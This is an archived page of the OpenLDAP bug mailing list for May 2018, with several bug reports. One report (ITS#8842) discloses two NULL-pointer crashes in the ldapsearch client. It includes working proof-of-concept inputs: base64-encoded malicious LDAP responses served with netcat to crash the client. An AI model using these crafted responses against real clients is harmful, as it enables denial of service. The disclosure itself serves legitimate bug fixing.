openldap-bugs May 2018

openldap-bugs@openldap.org

18 participants
45 discussions

Re: (ITS#8844) LMDB mdb_env_close is unsafe in forked child
by h.b.furuseth＠usit.uio.no 02 May '18

02 May '18

On 02/05/2018 18:05, hyc(a)openldap.org wrote: > Following on from ITS#8505. > mdb_env_close0() uses env->me_pid when clearing the readers table. If the env > was open in a process that forked, and the child process calls mdb_env_close(), > it will be clearing the wrong PID. Change this to use getpid() instead. Wait, what? The child didn't write any pids to the table. If there are pids for it to clear, something is wrong. That can be: - The pid is from an older run, and the system reused the pid. If we code for this, it should be to clear such pids during mdb_env_open. It gets very arbitrary to clear them when the user does env_close() in the child and the child happens to have the that reused pid. - The child opened a new MDB_env with the same path, and closes the parent's env afterwards. Don't Do That, users. But what to do in this situation, if we are to have code for it, is to do nothing with the lockfile. Not close it either, since closing it will lose the lock for the env which was opened in the child.

1 0

(ITS#8844) LMDB mdb_env_close is unsafe in forked child
by hyc＠openldap.org 02 May '18

02 May '18

Full_Name: Howard Chu Version: 2.4 OS: Linux URL: ftp://ftp.openldap.org/incoming/ Submission from: (NULL) (83.136.45.253) Submitted by: hyc Following on from ITS#8505. mdb_env_close0() uses env->me_pid when clearing the readers table. If the env was open in a process that forked, and the child process calls mdb_env_close(), it will be clearing the wrong PID. Change this to use getpid() instead.

1 0

(ITS#8843) null modlist with MMR > 2 can cause segv
by quanah＠openldap.org 02 May '18

02 May '18

Full_Name: Quanah Gibson-Mount Version: 2.4.46 OS: Linux URL: ftp://ftp.openldap.org/incoming/ Submission from: (NULL) (47.208.148.239) There is a race condition with MMR >2 that can cause slapd to segv, due to the op->modlist being set to NULL for a change that's already been processed. If the target entry is already newer than the mod, and we then look in the logDB to see what was changed, and the newer mod is a delete(attr) then any other changes to that attr are dropped from the modlist, which can result in the modlist being NULL

1 0

(ITS#8842) NULL pointer derefence
by openldap＠katzen.cc 01 May '18

01 May '18

Full_Name: Catz Meow Version: openldap-2.4.46 OS: Archlinux URL: ftp://ftp.openldap.org/incoming/ Submission from: (NULL) (134.19.121.246) 2 small issues: I'm keeping it brief, let me know if you need more information. A malicious LDAP server or mitm attacker can craft a response that causes the ldap client to crash. Nothing critical, just a simoke DoS. echo "MAwCAQFhBwoBAAQABAAwNgIBAnkxBBFkYz1leGFtcGxlLGRjPWNvbQoBAgoBAAIBAAIBAAEBAIcL b2JqZWN0Y2xhc3MwADCBiQIBAmSBgwQRZGM9ZXhhbXBsZSxkYz1jb20wbjAnBAtvYmplY3RDbGFz czEYBAhkY09iamVjdAQMb3JnYW5pemF0aW9uMA8EAmRjMQkEB2V4YW1wbGUwDgQBbzEJBAdFeGFt cGxlMCIEC2Rlc2NyaXB0aW9uMRMEEUV4YW1wbGUgZGlyZWN0b3J5MHkCAQJkdAQZY249cm9vdCxk Yz1leGFtcGxlLGRjPWNvbTBXMCMEC29iamVjdENsYXNzMRQEEm9yZ2FuaXphdGlvbmFsUm9sZTAM BAJjbjEGBARyb290MCIEC2Rlc2NyaXB0aW9uMRMEEURpcmVjdG9yeSBNYW5hZ2VyMIIBcAIBAmSC AWkEGnVpZD1hZGFtLGRjPWV4YW1wbGUsZGM9Y29tMIIBSTA6BAtvYmplY3RDbGFzczErBAN0b3AE B2FjY291bnQEDHBvc2l4QWNjb3VudAQNc2hhZG93QWNjb3VudDAMBAJjbjEGBARhZGFtMA0EA3Vp ZDEGBARhZGFtMBQECXVpZE51bWJlcjEHBAUxNjg1OTASBAlnaWROdW1iZXIxBQQDMTAwMB0EDWhv bWVEaXJlY3RvcnkxDAQKL2hvbWUvYWRhbTAZBApsb2dpblNoZWxsMQsECS9iaW4vYmFzaDAPBAVn ZWNvczEGBARhZGFtMBcEEHNoYWRvd0xhc3RDaGFuZ2UxAwQBMDAQBAlzaGFkb3dNYXgxAwQBMDAU BA1zaGFkb3dXYXJuaW5nMQMEATAwOAQMdXNlclBhc3N3b3JkMSgEJntTU0hBfXMzdWIwNnpCNVd2 UmVUZFZPOEVRelRMWVhvSFRCWGVNMAwCAQJlBwoBAAQABAA=" | base64 -d | nc -lvp 14222 ./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b dc=example,dc=com -h 127.0.0.1:14222 -x -w secret Affected code: ./clients/tools/ldapsearch.c static int dosearch( [...] case LDAP_RES_INTERMEDIATE: npartial++; ldap_parse_intermediate( ld, msg, &retoid, &retdata, NULL, 0 ); nresponses_psearch = 0; if ( strcmp( retoid, LDAP_SYNC_INFO ) == 0 ) { The problem here is that retoid can be NULL after ldap_parse_intermediate() is called. Another NULL pointer dereference caused by a bad response: echo "MAwCAQFhBwoBAAQABAAwgYkCAQJkgYMEEWRjPWV4YW1wbGUsZGM9AARtMG4wJwQLb2JqZWN0Q2xh c3MxGAQIZGNPYmplY3QEDG9yZ2FuaXphdGlvbjAPBAJkYzEJBAdleGFtcGxlMA4EAW8xCQQHRXhh bXBsZTAiBAtkZXNjcmlwdGlvbjETBBFFeGFtcGxlIGRpcmVjdG9yeTB5AgECZHQEGWNuPXJvb3Qs ZGM9ZXhhbXBsZSxkYz1jb20wVzAjBAtvYmplY3RDbGFzczEUBBJvcmdhbml6YXRpb25hbFJvbGUw DAQCY24xBgQEcm9vdDAiBAtkZXNjcmlwdGlvbjETBBFEaXJlY3RvcnkgTWFuYWdlcjCCAXACAQJk ggFpBBp1aWQ9YWRhbSxkYz1leGFtcGxlLGRjPWNvbTCCAUkwOgQLb2JqZWN0Q2xhc3MxKwQDdG9w BAdhY2NvdW50BAxwb3NpeEFjY291bnQEDXNoYWRvd0FjY291bnQwDAQCY24xBgQEYWRhbTANBAN1 aWQxBgQEYWRhbTAUBAl1aWROdW1iZXIxBwQFMTY4NTkwEgQJZ2lkTnVtYmVyMQUEAzEwMDAdBA1o b21lRGlyZWN0b3J5MQwECi9ob21lL2FkYW0wGQQKbG9naW5TaGVsbDELBAkvYmluL2Jhc2gwDwQF Z2Vjb3MxBgQEYWRhbTAXBBBzaGFkb3dMYXN0Q2hhbmdlMQMEATAwEAQJc2hhZG93TWF4MQMEATAw FAQNc2hhZG93V2FybmluZzEDBAEwMDgEDHVzZXJQYXNzd29yZDEoBCZ7U1NIQX1zM3ViMDZ6QjVX dlJlVGRWTzhFUXpUTFlYb0hUQlhlTTAMAgECZQcKAQAEAAQA" | base64 -d | nc -lvp 14222 ./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b dc=example,dc=com -h 127.0.0.1:14222 -x -w secret The PoC leads to memcpy being called with a NULL pointer as second argument (ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c): AC_MEMCPY( str, ava->la_value.bv_val, ava->la_value.bv_len + 1);

1 0

Re: (ITS#8616) olcSpNopresent and olcSpReloadHint can't be modified dynamically
by quanah＠symas.com 01 May '18

01 May '18

--On Tuesday, March 14, 2017 6:58 PM +0000 elecharny(a)symas.com wrote: Also fails for olcSpSessionLog (if it wasn't defined when the cn=config db was loaded) --Quanah -- Quanah Gibson-Mount Product Architect Symas Corporation Packaged, certified, and supported LDAP solutions powered by OpenLDAP: <http://www.symas.com>

1 0

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

openldap-bugs May 2018